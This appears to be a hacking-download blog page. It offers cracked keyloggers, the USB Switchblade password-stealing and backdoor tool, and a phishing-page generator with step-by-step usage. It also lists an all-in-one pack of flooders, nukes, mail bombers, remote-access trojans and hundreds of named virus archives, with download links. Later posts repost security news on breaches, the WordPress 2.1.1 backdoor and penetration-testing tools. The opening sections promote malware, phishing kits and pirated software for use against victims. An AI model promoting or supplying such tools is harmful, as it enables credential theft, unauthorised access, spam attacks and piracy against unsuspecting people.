Keylogger collection - 8 in 1 keyloggers with cracks

This contains over 4319 KB of the best keylogges out their

------ Brutin added 13 Minutes and 30 Seconds later. ------

Sureshot Ghost Keylogger v.3.80
Quick Keylogger 2.1.027
Embrace
Family Key Logger
Easy Keyboard Logger v.1.0
Blazingtools Perfect Keylogger v.1.6.2.0
Ardamax Keylogger v.1.9

All with cracks

Free Download


Keylogger collection

Read more on this article...

USB Switchblade is the outcome of community project to merge various tools and techniques that take advantage of various Mic*ft Windows security vulnerabilities, the majority of which are related to USB ports.

The primary purpose of this tool is to silently recover information from Windows systems, such as password hashes, LSA secrets, IP information as well as browser history and autofill information as well as create a backdoor to the target system for later access. The tool through community development ended up creating a Frankenstein application that exposed some very serious security vulnerabilities in Windows, particulary with regards to removable media devices.

The tool takes advantage of a security hole in U3 drives that allows the creation of a virtual CD-ROM drive, whicn allows the Windows autorun feature to work (unless disabled on the target system). Even if autorun or a U3 drive is not used, the application can still be started by executing a single script on the drive.

The most damaging feature of this tool is the ability to extract the passwords hashs from the target system and load them onto the drive for later cracking through the use of Rainbow tables. The weakness of Windows LM hashes is farily well known. With this application installed on a U3 drive it would only take a few seconds for someone with malicious intent to plug in the drive to an open USB port on a system and walk away with the passwords for that system.

The application also finds browser history (for both IE and Firefox) including autofill information (exposing website passwords etc), as well as AIM and MSN Messenger passwords. It will also reveal product keys for some applications (mostly Mic*ft applications).

The tool will also create a ghost admin account, which can function as a back door to the system if it is not behind a firewall.

The tool has evovled in the last month or so to include mulitple version including a way to circumvent anti-virus protection that would usually detect some of the malicious exectubles. Additional files were also added to check the vulnerabilities listing all security and patches installed to the target system, as well as another which will start a VNC service silently in the background.

Downloads
Original Version (No U3 autorun hack)
USB Switchblade U3 Autorun Enabled (U3 drive required)
SanDisk U3 Payload
Memorex Payload
More versions can be found here including a combination version which uses either the U3 autorun hack or run manually via a script.

Free Download


USB Switchblade-Tool For SstealingWindows Passwords, History

Read more on this article...

this program is (as stated) a phishing page generator, with compatibly for user-made plugins as well. With this bundle you will receive the following--

o * AOL
o * Bebo
o * Bootleggers
o * ESpinTheBottle
o * FaceBook
o * Freewebs
o * GMail
o * Hi5
o * Hotmail (old)
o * Login Live
o * Messblack Forums
o * MillerSmiles Forums
o * Mob Life
o * MSN Delete Checker
o * Myspace
o * Rapidshare
o * Windows Live Mail
o * World of Warcraft
o * Yahoo
How To Use:
Here is a brief (but sweet) tutorial:

1. Choose a password (This will be used later on)
2. Pick a Template from the list to be created
3. Generate your page
4. Upload it to a php host
5. ???
6. Profit

Viewing your Logged Passwords:
Probably the most important part of the entire thing.
To view your logged passwords browse to (http://fakesite.com/example.php) and enter 'viewlog' into the email/username field and the password you chose in step 1.
If your password was correct you will be taken to the page with your phished accounts along with their IP Address.

You do not need an email address and nothing is stored on an outside server so it's completely independent.

Free Download


HackShadow UltraPhish Phishing Generator

Read more on this article...

Free Download


mIRC spammer

Read more on this article...

The guys at BackTrack e-mailed me to let me know their Version 3 BETA has been released recently, and perhaps our readers would like to know about it.

For those that don’t know BackTrack evolved from the merging of two wide spread security related distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.


ackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts. Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).


Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date.

It’s definitely a favourite amongst pen-testers, myself included.

Free Download


BackTrack Live Hacking CD BETA 3

Read more on this article...

Audio theme:
Halman party - Greek Lover



This AIO have:


Flooders:
BattlePong Pro
Beer
Bmb2
Boom
DOS Panther Modern Mode 1
DOS Panther Modern Mode 2
Final Fortune 2.4
Gewse97
Hak Tek Version 1.1
Internet Packet Tools v1.00 Build 300
IPing 32
Kaput 1.0 beta 1.5
Mutilate
Octopus
Ping
Port**** 1.0b2
Pounder Alpha 1
Shockwave
Sonar v1.0.2
Technophoria Battle Pong
X-Script ICMP Bomber v0.3


Gr33k-L0v3r says:
CainAbel NT2KXP Password Cracker
Fake Webcam 1.0
Mail Freezers
MessenPass 1.04
Msn Webcam Recorder
Opera 9.0 Build 8031
Resource Hacker
Serials 2000


IRC:
Mass IP Logger


Keyloggers:
DOS Keylogger
Easy Macro v2.01
Invisible Key Logger 97
Keycopy v1.01
Keylog Windows v1.5
Powered keylogger v1.3.5.56


Mail Bomb:
Anonymous Mail Bomber.zip
Divine Intervention.zip
Euthanasia v1.52.zip
fmbomb.zip
Homicide.zip
KaBoom v3.0.zip
Mail Bomber v8.1.zip
Mail Fraud.zip
mailbombv02b.zip
MiSoSKiaN's Fake Mail.zip
Nemisis Mail Bomber v1.0.zip
Poperganda v2.0.zip
Quick Fyre.zip
Saddamme v0.2.zip
SMS Bomber v1.3.zip
Unabomber.zip


Mailbombers:
Aenima 1.5
Anony Mail
Euthanasia version 1.52
Flamenews
Quick Fire
Scythe
Sneaky
UnaBomber


Needed Files:
Comdlg32.ocx.zip
Vbrun300.dll.zip
Winsock.dll.zip


Ping & Nukes:
Battle Pong v1.0
BitchSlap v1.0
Click v1.4
F-ed Up v2.0
Gimp
IgmpNuke v1.0
kod
LORNuke v2.0
Meliksah Nuke v2.5
Muerte v2.1
Nuke em v1.0
Nuke v2.3


Port Scanners:
Cha0scanner v2.0
CoreScan
FTP-Scan
HackCityOPS
PortPro v0.93
Warp Scanner 2.0


Remote Administration Tool:
Clients:
back orifice source.zip
BackDoor v2.0.zip
DeepThroat v3.1.zip
Doraah War Engine v1.0b.zip
Hack 'a' Tack v1.20.zip
Http Bomber v1.001b.zip
Kuang2 Client v0.21.zip
NetBus v1.20.zip
NetBus v1.70.zip
NetBus v2.0b Pro.zip
SchoolBus v1.85.zip
Shadow Remote Administator & Control v1.04.zip
Shadow Security Scanner v5.07.ZIP
Shadow Security Scanner v5.21.ZIP
SubSeven v2.1 Gold Edition.zip
Vampire v1.2.zip
WebCracker v4.0.zip
WinCrash v2.0.zip
wwwhack v1.913.zip


Servers:
BadBoy Killer.zip
k2psf_src.zip
kuang the virus.zip
netbus153src.zip
PSource.zip


Technical Help:
Access SQL.pdf
AMD Athlon and Duron Processor - Based System Build Checklist.pdf
AMD Athlon Processor System Cooling Guidelines.pdf
AMD Builders Guide for Desktop - Tower Systems.pdf
AMD Processor.pdf
AMD Thermal - Mechanical & Chassis Cooling Design Guide.pdf
AMD Thermal - Mechanical and Chassis Cooling Design Guide.pdf
BIOS Error Messages.htm
BIOS POST Codes.htm
Bluetooth.pdf
Choose Your Words.pdf
Communicat - Intel.pdf
Connection Speed.pdf
Controlling Internet Explorer.pdf
Create Your Own CDs.pdf
Custom Interface.pdf
Customising Netscape 6.pdf
D845WN Changes.pdf
D845WN.pdf
Data Mining.pdf
Desktop Look.pdf
Digital Audio - Intel.pdf
Digital Certificates.pdf
Dual Booting.pdf
Email Forever.pdf
FAQ - AMD Athlon MP - AMD Athlon XP.pdf
FAQ AMD Athlon Processor - Based Computer.pdf
FAQ.htm
Favorites.pdf
Find The Orphan.pdf
Fixing Outlook Files.pdf
Gaming - Intel.pdf
GCE8520B.pdf
Hard Drive Upgrade.pdf
How to Check AMD CPU.pdf
How to Make Skin For Windows.pdf
Intel Celeron Processor.pdf
Intel Pentium 4 Processor.pdf
Internet Explorer Channels.pdf
Internet Printing.pdf
Internet Privacy.pdf
Internet Spyware.pdf
JPEG 2000.pdf
Keyboard Shortcuts.pdf
Know Your BIOs.pdf
Know Your Cable.pdf
Manage Your Passwords.pdf
Modifying Directory Defaults.pdf
Mouse Keys.pdf
MPEG-4.pdf
Net Connections.pdf
Network Your Home.pdf
Online Databases.pdf
Overclocking Your CPU.pdf
P2P Technology.pdf
PCs of The Future.pdf
PDA Data Exchange.pdf
PDA Printing.pdf
Printed Labels.pdf
Remote Control Your PC.pdf
Rescue Your System.pdf
RFB Protocol v3.3 Header.pdf
RFB Protocol.pdf
Safe Surfing.pdf
Search Windows 2000.pdf
Secure Your PDA.pdf
Setup Voice Mail & Fax.pdf
Setup Your Web Cam.pdf
Share Your PC.pdf
Socket A AMD Processor and Heatsink Installation Guide.pdf
Tools For Your Business.pdf
Types of Virus.pdf
Ultimate Memory Guide.pdf
Understanding Processor Performance.pdf
VB Code.htm
Viruses That Aren't.pdf
Visualise Your Site.pdf
Web Animation.pdf
Web Presentations.pdf
Which Registrar.pdf
Windows 2000 Born to Serve.pdf
Windows 2000 Internet Service.pdf
Windows 2000.pdf
Word 2000.pdf
XML Power.pdf

AOpen:
AK73.pdf
AK73av.pdf
AK75.pdf
AK75p.pdf
AK77333.pdf
AK77333FN.pdf
AK77400MAX.pdf
AK778XM.pdf
AK778XN.pdf
AK77p.pdf
AK77pa133.pdf
AK77U2333.pdf
ATA100 IDE Raid.pdf
EzRestore.pdf
MK332a.pdf
Mk73le.pdf
Mk73len.pdf
MK77.pdf
MK77333.pdf
MK77MII.pdf


Viruses:
!-.zip
44.zip
4mat2.zip
8fish.zip
90210.zip
Acidtrip.zip
Aduh b.zip
Aduh.zip
AmazonQueen10.zip
AmazonQueen11.zip
AmazonQueen20.zip
Ambulance B.zip
android.zip
Androide.zip
andropin.zip
andy.zip
Angel of Death.zip
anna.zip
another.zip
antenter.zip
anti-win.zip
anticaro.zip
antieta.zip
antipode.zip
Anti_daf.zip
apocalyp.zip
Apparition.700.zip
aprilone.zip
apss1120.zip
Apss1135.zip
arbeit.zip
archer.zip
ArhiWorm.300.zip
Ari 1962.zip
Arihworm 2.1.zip
Asex0_99.zip
Astronauta.zip
atomic10.zip
auntb.zip
avp-aids.zip
Babasoni.zip
babybug.zip
bacteri1.zip
bacteri2.zip
Bacteria 1.zip
Bacteria 2.zip
badattit.zip
bad_reli.zip
barney.zip
barrotes.zip
Baster.zip
Bat-126.zip
Bat-282.zip
Bat-506.zip
Bat-527.zip
Batalia1.zip
Batalia2.zip
Batalia3.zip
Batalia3b.zip
Batalia4.zip
Batalia5.zip
Batalia6.zip
Batman 186.zip
Batvir.zip
beavis.zip
BeavisVD.zip
Bengal Tiger.zip
berwyn.zip
Bfv_B 475.zip
Bingo.zip
bin_acid.zip
bin_obs.zip
bios_men.zip
Bit Addic2_0.zip
Bitlezz.zip
bizatch.zip
Blah-3379.zip
Bmbb.zip
Borg.zip
brother.zip
bubbles1.zip
bubbles2.zip
Bug 560.zip
Bugs.zip
Burglar.zip
Bv Root.zip
Bv Vx 558.zip
Bv_Lame 874.zip
Cerebrus.zip
Cheezy 329.zip
Cih 14.zip
cih.Zip
ClsV.zip
Code-169.zip
Code-356.zip
Cold.a .zip
Combat.735.zip
Combat.736.zip
Combat.737.zip
conjalad.zip
Craz C 1414.zip
Craz E.1267.zip
cyber101.zip
daddy.zip
Dark Akuma.zip
Darky.a .zip
Debug virus.zip
Ditty.zip
drazil.zip
Drop2645.zip
Duke.102.zip
elvira.zip
Enmity v1.0.zip
First Path.zip
For-322.zip
Fret102.zip
Froggy 1476.zip
Galindo.zip
GeeWiz 145.zip
GeeWiz 216.zip
Goofy.zip
GPB.zip
Gremlin 1424.zip
Grunch 1189.zip
Guru.zip
Gwar-Messev.zip
Hellow.zip
Heretic.zip
Hex virus.zip
Highjaq.zip
Hillary.zip
HLLC.Friend.4752.zip
HLLC.Path.4464.zip
hllspwn2.zip
hma-boot.zip
HNY.3350.zip
Hot to Trot 3.zip
HTML.Tramp.zip
I hater-u-all.zip
Ich.zip
Illusion.zip
imi10b.zip
incubus.zip
Infect 406.zip
inferdem.zip
Ins.zip
insert.zip
insert2.zip
inv-evil.zip
Invircible Killer.zip
ioverlay.zip
itti_a.zip
itti_b.zip
jasmine.zip
Jezebel.zip
julio13.zip
k-cmos.zip
kellie.zip
Kellie_B.zip
keykap_2.zip
Killer-.zip
killer.zip
Kit.zip
Klez.zip
kmfdm.zip
kode4v10.zip
kode4v20.zip
kohn-6.zip
kohn-9.zip
kompanio.zip
Koshi 1.9.zip
krad.zip
Krile1.zip
LIFE_STAGES.TXT.zip
liveviruses.zip
lizard.zip
Lorez [Virogen].zip
LOVE-LETTER-FOR-YOU.TXT.zip
LOVE-LETTER-FOR-YOU_TXT.zip
magistr.zip
Manowar.zip
MarkJ.zip
Mdma.zip
melissa.zip
Melt 2A.zip
Melt 3C 1811.zip
Melt 3F.zip
Metallica.A .zip
MF.227.zip
MF.251.zip
MF.282.zip
MircBat 1.1.zip
Mobius.zip
Moral 941.zip
mummy.zip
natas.zip
neuropth.zip
New Host.zip
Nice 2897.zip
No Pasaran.zip
Npox-v11.zip
Nuc.a .zip
Nuc.b .zip
nukeviruses.zip
Nulspace.zip
nympho10.zip
odiumrel.zip
Offspr82.zip
ontario3.zip
opwolf.zip
opy.zip
Orag.zip
Orgasmatron.zip
otis.zip
ow-42.zip
Owrb.zip
Owrb2.zip
p.zip
Parasite.zip
Passion 1354.zip
Paykiller 21.zip
Penfold.zip
PG94.zip
PifV.zip
Polybat.zip
Pot-B.zip
Pot.zip
qmagick.zip
quake-o.zip
qý.zip
Ramble.zip
revengeviruses.zip
sabbath.zip
satanbug.zip
SBVM 0.02d.zip
scramble.zip
scroll.zip
seneca.zip
senecab.zip
Sexy.zip
sft.zip
Shadow.zip
Shak 1268.zip
Shimmer 1.zip
Shimmer 2.zip
shimmer1.zip
shinyhap.zip
shithole.zip
sillamb1.zip
sillamb2.zip
Simplex-CE.zip
sircam.zip
sister.zip
Skul.zip
Skywalke.zip
Sly_I boot.zip
Small.a .zip
small.zip
smallvir.zip
smurf.zip
sobj3_0.zip
Sofa.zip
Sofia_v1.zip
sofia_v2.zip
soldier.zip
Soliton.zip
soupy.zip
Spawn.zip
SpiceGirl 1619.zip
SpiceGirl2123.zip
ster1.zip
ster2.zip
Stioxyl.zip
Stupid.zip
sturm.zip
Suburbs.zip
suicide.zip
sundevl1.zip
Super.544.zip
Svs-B.zip
swedwarr.zip
Symbolic.a.zip
Sys 602.zip
sysinf.zip
SysV.zip
Tally.b .zip
Text File Virus.zip
The Mole.zip
Tiny.zip
Tnse-Batch.zip
Trinity.zip
unameit.zip
v100.zip
v786v201.zip
v80hex.zip
v8_ball.zip
Vbs Worms Generator 2 Beta.zip
VBS.Freelink.zip
Vir!.zip
Viru 412.zip
virus.zip
ViZ.zip
Voff 1363.zip
Wagner.zip
warez.zip
Weird Al.zip
Wise2233.zip
wpart_c.zip
Xop Winstroy.zip
Xop.zip
yougotit.zip
Zeke.zip
ZekeCall.zip
Zep.zip
zero-2-0.zip
Zipbat 607.zip
Zop-b.zip
Zor.zip


Z@4r1x:
CrackersKit 2005
Cracks
Golden eye 2005
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Net Tools Suite Pack Abril
NFO-Tools All In One
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP


Download:
http://rapidshare.com/files/56791534/Gr33k-10v3r.part1.rar
http://rapidshare.com/files/56799286/Gr33k-10v3r.part2.rar

Read more on this article...

Bluetooth pentesting framework
About it

http://drgr33nsblog.blogspot.com/2008/03/blue-smash-v10e-released.html


Blue|Smash Home
http://drgr33nsblog.blogspot.com/


Latest Relise Blue|Smash-v1.0e
http://www.mediafire.com/?ze9vyputnbv


Remote exploit info

http://forums.remote-exploit.org/showthread.php?t=10723&highlight=Blue%7CSmash
http://forums.remote-exploit.org/showthread.php?t=12301&highlight=Blue%7CSmash



Blue|Smash Demo
http://www.mediafire.com/?4t0chlyaaye
http://www.youtube.com/watch?v=uOflOsODXeo

Read more on this article...

Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has many other features.

It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies.

It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well.

Free Download



Angry IP Scanner download

Read more on this article...

It seems to be trendy lately to make tools which can create custom or more specific word lists for password cracking, just last week we posted about the web application The Associative Word List Generator (AWLG), which crawls the whole web to look for associated words with a given topic.

This application is more towards creating custom word lists from a specific domain by crawling it for unique words. Basically you give the application a spidering target website and it will collect unique words. The application is written in Ruby and is called CeWL, the Custom Word List generator. The app can spider a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

IF you combine the info output by CeWL and AWLG with the standard wordlists for password cracking - you should have a fairly comprehensive set.

By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.

Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.

Installation

CeWL needs the rubygems package to be installed along with the following gems:

* http_configuration
* mime-types
* mini_exiftool
* rubyzip
* spider

FREE DOWNLOAD


cewl_2.0.tar.bz2

[Source: Darknet ] Read more on this article...

I saw a pretty interesting article a few days attempting to reverse engineer the mosaic tool used often online to obscure sensitive or confidential information.

The article shows that the mosaic isn’t actually very random, and in a way you can brute force reverse engineer the mosaic to reveal the contents before they were obscured.

It’s ok for faces, but when it comes to letters/numbers and text it can be uncovered.

For the most part this is all fine with peoples’ faces as there isn’t a convenient way to reverse the blur back into a photo so detailed that you can recognise the photo. So that’s good if that is what you intended. However, many people also resort to blurring sensitive numbers and text. I’ll illustrate why that is a BAD idea.

Suppose someone posted a photo of their check or credit card online for whatever awful reason (proving to Digg that I earned a million dollars, showing something funny about a check, comparing the size of something to a credit card, etc.), blurring out the image with the far-too-common mosaic effect to hide the numbers.

Which is true, it is very common.

There is some ubermath geek stuff after this, analysing the brightness vector of the mosaic areas.

In this case, the account number 0000001 creates mozaic brightness vector a(0000001)=[213,201,190,...]. We find the mozaic brightness vector for every account number in a similar fashing using a script to blur each image and read off the brightnesses. Let a(x) be the function of the account number x. a(x)_i denotes the ith vector value of the mozaic brightness vector a obtained from account number x. Above, a(0000001)_1 = 213.

We now do the same for the original check image we found online or wherever, obtaining a vector we hereby call z=[z_1,z_2,...z_n]:

Anyway go ahead and check the article out, a very interesting read and a real example of proper hacking, thinking of a solution to something, thinking how to break something..
[Read More - Why Blurring or Mosaicing Important]

[Source: Darknet ]
Read more on this article...

Google has fixed a security flaw in its desktop search software that created a means for hackers to rifle through personal files on users’ PCs.

A failure in Google Desktop to “properly encode output containing malicious or unexpected characters” created a means for hackers to cross from the web environment to the desktop application environment.

So if you are running Google Desktop we suggest you update it ASAP.

The attack, outlined in a paper (PDF) released by the firm, uses a cross-site scripting (XSS) flaw in the Google Desktop application in conjunction with any other XSS flaw in the Google.com domain to install malicious JavaScript on the user’s computer. Using the technique, an attacker could create a JavaScript program that Google Desktop repeatedly runs, allowing the attacker to search a victim’s computer using terms most likely to dredge up interesting data.

Google released an updated version of Google Desktop that fixes the local cross-site scripting flaw earlier this month, but many users may not have gotten the patch, said Danny Allan, director of security research for Watchfire. Because of the popularity of Google Desktop, there could be a large number of users with vulnerable systems.

Read More:

Google Desktop flaw allows data theft
Google patches critical desktop flaw
Serious Flaw in Google Desktop Prompts Patch

[Source: Darknet ]

Read more on this article...

This is a pretty cool new development, something straight out of a Tom Clancy thriller or a spy/hacker movie.

Introducing Spy Coins! People are actually being warned about picking up stray coins as they might have surveillance devices inside.

Can the coins jingling in your pocket trace your movements? The Defense Department is warning its American contractor employees about a new espionage threat seemingly straight from Hollywood: It discovered Canadian coins with tiny radio frequency transmitters hidden inside.

In a U.S. government report, it said the mysterious coins were found planted on U.S. contractors with classified security clearances on at least three separate occasions between October 2005 and January 2006 as the contractors traveled through Canada.

It’s not the best way to hide a surveillance device though as someone might actually spend it…then your plan is foiled, they could also easily lose it, leave it on a desk, put it in a donation box or simply give it away.

“It wouldn’t seem to be the best place to put something like that; you’d want to put it in something that wouldn’t be left behind or spent,” said Jeff Richelson, a researcher and author of books about the CIA and its gadgets. “It doesn’t seem to make a whole lot of sense.”

Canada’s physically largest coins include its $2 “Toonie,” which is more than 1-inch across and thick enough to hide a tiny transmitter. The CIA has acknowledged its own spies have used hollow, U.S. silver-dollar coins to hide messages and film.

The government’s 29-page report was filled with other espionage warnings. It described unrelated hacker attacks, eavesdropping with miniature pen recorders and the case of a female foreign spy who seduced her American boyfriend to steal his computer passwords.

CIA Archive - Hollow Coin

[Source: Darknet ]
Read more on this article...

A paper about cracking SHA-1 originally surfaced in 2005, from a fairly reputable scientific source in China, it was widely publicised nor talked about much.

But then recently, just last month China managed to make a wave out of it, almost 2 years after the initial ‘report’.

It was even Slashdotted on January 20th 2007, the article states the following:

These two main algorithms are currently the crucial technology that electronic signatures and many other password securities use throughout the international community. They are widely used in banking, securities, and e-commerce. SHA-1 has been recognized as the cornerstone for modern Internet security. According to the article, in the early stages of Wang’s research, there were other data encryption researchers who tried to crack it. However, none of them succeeded. This is why in 15 years Hash research had become the domain of hopeless research in many scientists’ minds.

SHA-1 Broken

Cryptanalysis of SHA-1

[Source: Darknet ] Read more on this article...

Recently a fairly huge credit card breach occurred involving a large retail company called TJX, with more than 2,000 retail stores.

Some pretty well known brands there, I know I’ve used some of them…the sad part is they themselves still haven’t worked out the extent of the damage done to their information.

For me this has serious integrity implications.

The TJX Companies, a large retailer that operates more than 2,000 retail stores under brands such as Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx and A.J. Wright, said on Wednesday that it suffered a massive computer breach on a portion of its network that handles credit card, debit card, check and merchandise transactions in the United States and abroad.

The company does not know the extent of the breach, which was first discovered in December 2006. However, hackers may have made off with credit and debit information from transactions in the United States, Canada and Puerto Rico in 2003 as well as transactions between May and December 2006, according to a company statement.

Hopefully the retailer and the credit card companies will bear the brunt of the hack attack and not pass the costs onto the customers.

I really believe customers shouldn’t be penalized for sloppy company security.

The TJX breach recalls other recent hacks, including BJ’s wholesale club and another, reportedly at OfficeMax in 2005. Those breaches, as well as incidents like the hacking of card processor Card Systems, prompted the payment card industry to issue new rules, dubbed the PCI, about how sensitive data is stored and transmitted on internal systems.

However, Spitzer of the MBA said that banks still bore the brunt of security breaches at retailers because they have to pay to reissue cards to customers and absorb the financial losses from unauthorized account withdrawals. Small banks and credit unions often have trouble absorbing those costs, though they are not at fault in the breach itself, Spitzer said.

[Source: Darknet ]

Read more on this article...

Some sneaky hacker got into the Wordpress download server and placed a backdoor in the latest available version (2.1.1).

Luckily within a day someone reported the exploit to the Wordpress team and they took the site down to investigate.

This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

If you downloaded 2.1.1 as soon as it came out it should be ok, but a few days after that the compromised version was available.

Do install 2.1.2 and upgrade ASAP just to be safe.

If your blog is running 2.1.1, please upgrade immediately and do a full overwrite of your old files, especially those in wp-includes. Check out your friends blogs and if any of them are running 2.1.1 drop them a note and, if you can, pitch in and help them with the upgrade.

If you are a web host or network administrator, block access to “theme.php” and “feed.php”, and any query string with “ix=” or “iz=” in it. If you’re a customer at a web host, you may want to send them a note to let them know about this release and the above information.

I’m thankful that the Wordpress team has dealt with this situation so efficiently and professionally and it just gives me more faith in their team.

[Source: Darknet ] Read more on this article...

Ah, FBI slammed again, it’s not the first time this has happened.

Remember when a Consultant Breached FBI’s Computers?

It also reminds me of when Homeland Security Scored an F for Internal Security AGAIN.

The Government Accountability Office, the federal government’s watchdog agency, Thursday released a report critical of the FBI’s internal network, asserting it lacks security controls adequate to thwart an insider attack.

In the report, titled “Information Security: FBI Needs to Address Weaknesses in Critical Network,” the authors — Gregory Wilshusen, GAO’s director of information security issues, and Chief Technologist Keith Rhodes — said the FBI lacks adequate network security controls.

The FBI “has an incomplete security plan,” the report concluded.

The bureau, which had the opportunity to review the GAO’s findings before publication, responded that it wasn’t arguing with some of the technical observations expressed in the GAO report, but disagreed that the FBI is open to unacceptable risk of an insider attack.

In a letter of response to the GAO, Dean Hall, the FBI’s deputy CIO, and Zalmal Azni, the FBI’s CIO, noted, “The FBI concurs with many of the GAO’s technical recommendations and the programmatic recommendation to continue the implementation of information security activities in order to fully establish a comprehensive Information Assurance Program.”

[Source: Darknet ] Read more on this article...

An interesting snippet from last month, AOL seems to have a strangely configued password system.

Users can enter up to 16 characters as a password, but the system only reads the first 8 and discards the rest. They are basically truncating the password at 8 characters.

A reader wrote in Friday with an interesting observation: When he went to access his AOL.com account, he accidentally entered an extra character at the end of his password. But that didn’t stop him from entering his account. Curious, the reader tried adding multiple alphanumeric sequences after his password, and each time it logged him in successfully.

It turns out that when someone signs up for an AOL.com account, the user appears to be allowed to enter up to a 16-character password. AOL’s system, however, doesn’t read past the first eight characters.

How is this a bad set-up, security-wise? Well, let’s take a fictional AOL user named Bob Jones, who signs up with AOL using the user name BobJones. Bob — thinking himself very clever — sets his password to be BobJones$4e?0. Now, if Bob’s co-worker Alice or arch nemesis Charlie tries to guess his password, probably the first password he or she will try is Bob’s user name, since people are lazy and often use their user name as their password.

And she’d be right, in this case, because even though Bob thinks he created a pretty solid 13-character password — complete with numerals, non-standard characters, and letters — the system won’t read past the first eight characters of the password he set, which in this case is exactly the same as his user name. Bob may never be aware of this: The AOL system also will just as happily accept BobJones for his password as it will BobJones$4e?0 (or BobJones + anything else, for that matter).

[Source: Darknet ]
Read more on this article...

SECURE Magazine is a freely available digital security magazine discussing some of the hottest information security topics. It can be distributed only in the form of the original non-modified PDF document.

DOWNLOAD - PDF document

* Microsoft Windows Vista: significant security improvement?
* Review: GFI Endpoint Security 3
* Interview with Edward Gibson, Chief Security Advisor at Microsoft UK
* Top 10 spyware of 2006
* The spam problem and open source filtering solutions
* Office 2007: new format and new protection/security policy
* Wardriving in Paris
* Interview with Joanna Rutkowska, security researcher
* Climbing the security career mountain: how to get more than just a job
* RSA Conference 2007 report
* ROT13 is used in Windows? You’re joking!
* Data security beyond PCI compliance - protecting sensitive data in a distributed environment

[Source: Darknet ]
Read more on this article...

Basically Ubuntu Ultimate Edition is Ubuntu Edgy Eft with a whole lot of software pre-added.

Sadly the author had to removed Java, Flash and Acrobat reader due to licensing agreements. But don’t worry as there is a custom repository in the release which includes all of these and much more.

* SMP Support (dual core CPUS) / works with single core as well
* 121 Additional Updates
* New Grub boot screen
* New theme and animated bootscreen
* New GDM theme
* New splash screen & wallpaper
* Updated Beryl
* Capture card support - TVTime / ATI-All-in-wonder
* Gaim Beta 6 - prebuilt with plugins.
* GKRealm - Realtime hardware monitor
* MGM - Moaning Goat Meter
* Newer Amarok then can be obtained from edgy repos
* Hardinfo - System information
* GTKPod - Ipod Sync software
* HTop - Process viewer
* Sysinfo - System information
* IPodder - Ipod sync software
* XSensors - Hardware sensor software
* Addition networking and wireless tools
* Gpixpod - Photo sync software for Ipod
* IPodslave - an iPod IO slave
* Xpenguins - Thanks Maddog

use torrents if you can or mirror first, unfortunately Ubuntu Ultimate 1.2 can not be downloaded locally due to bandwidth consumption, if you have some space to host a mirror please let the authors know.

Ubuntu Ultimate Edition

Ubuntu Ultimate 1.2 TORRENT

Ubuntu Ultimate 1.2 Mirror

Read more on this article...

The latest big news is that on February 6th the Kaspersky Customer Records database was hacked through a simple SQL injection flaw on the website. The hacker claimed it was possible to expose all customer data including users, activation codes, lists of bugs, admins, shot and so on. The anonymous hacker hasn’t actually posted any of the data, but has listed the database tables exposed here.

Later Kaspersky has stated that no data was actually exposed, apparently there was a flaw to do with data validation and perhaps only the database table names were exposed - not the data within.

So far though it’s all speculation unless the hacker releases the actual data and Kaspersky comfirms it there’s no way we can know what has actually transpired.

Anti-virus vendor Kaspersky Lab denies any data was stolen during a SQL injection attack launched Feb. 6. Well-known database security expert David Litchfield of NGSSoftware is doing a third-party review for Kaspersky.

Officials at anti-virus vendor Kaspersky Lab are adamant that no data was stolen during a hack of its U.S. support site over the weekend.

According to Kaspersky Lab, on Feb. 6, a hacker exploited a flaw on the Web site to launch a SQL injection attack. After Kaspersky officials received word of the breach Feb. 7, they took down the vulnerable site and replaced it.

The security company maintained in a press conference Feb. 9 that no data had been leaked. However, the anonymous hacker behind the attack publicized table names purportedly taken from a Kaspersky database the hacker accessed.

Kaspersky has already commissioned a 3rd party audit from well-known specialist in Database Security, David Litchfield the principal consultant with NGS Software.

I wonder if Mr. Litchfield will publish his findings publicly or they will be vetted through Kaspersky first, I’d imagine the latter - which again means we might never know the true extent of the vulnerability.

According to the company, the problem was due to the site not properly validating user input. Roel Schouwenberg, senior anti-virus researcher at Kaspersky, confirmed that the names of the tables are accurate. However, having the names of the tables does not mean the hacker actually accessed them, he noted.

Schouwenberg added that no credit card data was stored on the server targeted by the hacker, though there were product activation codes and 2,500 e-mail addresses for people who signed up for a product trial.

“This shouldn’t have happened,” Schouwenberg said, adding he was worried about the impact the hack would have on Kaspersky’s reputation.

The vulnerable code the hacker took advantage of to launch the attack was developed externally and did not go through Kaspersky’s normal code review process, Schouwenberg said.

It shouldn’t have happened? What insight these people have!

They are blaming the vulnerability on code developed externally, and it seems that from the story it’s limited data to do with some kind of software trial. It’s not the full customer records database.

Still I think we need to wait a little longer to get a clearer picture of what is going on, either way it looks like this might be an interesting story for us to follow.

[Source: Darknet ]

Read more on this article...